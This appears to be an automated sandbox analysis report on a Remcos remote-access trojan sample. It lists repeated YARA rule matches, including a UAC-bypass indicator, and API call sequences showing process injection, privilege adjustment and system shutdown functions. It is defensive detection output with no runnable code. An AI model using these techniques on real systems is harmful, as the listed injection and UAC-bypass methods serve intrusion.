              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A76C SystemParametersInfoW,5_2_04A9A76C

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_02B4DACC
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02B4DA44
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B4DBB0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B479B4 NtAllocateVirtualMemory,0_2_02B479B4
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_02B4AF58
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B47D00 NtWriteVirtualMemory,0_2_02B47D00
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4831C NtProtectVirtualMemory,0_2_02B4831C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B48BB0 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B48BB0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B48BAE GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B48BAE
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B479B2 NtAllocateVirtualMemory,0_2_02B479B2
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02B4D9F0
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,7_2_02C8DACC
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_02C8DA44
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,7_2_02C8DBB0
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8AF58 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,7_2_02C8AF58
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C87D00 NtWriteVirtualMemory,7_2_02C87D00
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C88BAE Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,7_2_02C88BAE
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C88BB0 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,7_2_02C88BB0
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C8D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,7_2_02C8D9F0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02B4EC74
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A94DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_04A94DB4
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B320C40_2_02B320C4
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B5D5960_2_02B5D596
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AD050B5_2_04AD050B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB65105_2_04AB6510
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB569E5_2_04AB569E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB16FB5_2_04AB16FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA57FB5_2_04AA57FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AC37005_2_04AC3700
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA51525_2_04AA5152
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB52865_2_04AB5286
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AD13D45_2_04AD13D4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB3C0B5_2_04AB3C0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB4D8A5_2_04AB4D8A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9CEAF5_2_04A9CEAF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ABDE2A5_2_04ABDE2A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB5F085_2_04AB5F08
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A928E35_2_04A928E3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ABD9CC5_2_04ABD9CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9B9175_2_04A9B917
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA59645_2_04AA5964
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AB5AD35_2_04AB5AD3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ACABA95_2_04ACABA9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ABDBFB5_2_04ABDBFB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA4BC35_2_04AA4BC3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068E36A85_2_068E36A8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068EC6DC5_2_068EC6DC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0690E7915_2_0690E791
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068F67295_2_068F6729
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069024C05_2_069024C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069144C55_2_069144C5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069064635_2_06906463
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068F65C05_2_068F65C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069212D05_2_069212D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069072D55_2_069072D5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0690604B5_2_0690604B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069221995_2_06922199
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068F5F175_2_068F5F17
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06906CCD5_2_06906CCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068EDC745_2_068EDC74
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0690EBEF5_2_0690EBEF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06905B4F5_2_06905B4F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069068985_2_06906898
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_068F59885_2_068F5988
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_069049D05_2_069049D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0690E9C05_2_0690E9C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0691B96E5_2_0691B96E
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C720C47_2_02C720C4
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: 7_2_02C7D59B7_2_02C7D59B
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: String function: 02C887A0 appears 48 times
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: String function: 02C746A4 appears 154 times
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFCode function: String function: 02C7480C appears 619 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04AB2525 appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04A82073 appears 51 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06903955 appears 53 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 069032EA appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04AB2B90 appears 53 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B48824 appears 45 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B344AC appears 73 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B3480C appears 931 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B344D0 appears 32 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B487A0 appears 54 times
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: String function: 02B346A4 appears 244 times
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs MeP66xi1AM.exe
              Source: MeP66xi1AM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@14/6@5/3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A95C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_04A95C90
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B37F5A GetDiskFreeSpaceA,0_2_02B37F5A
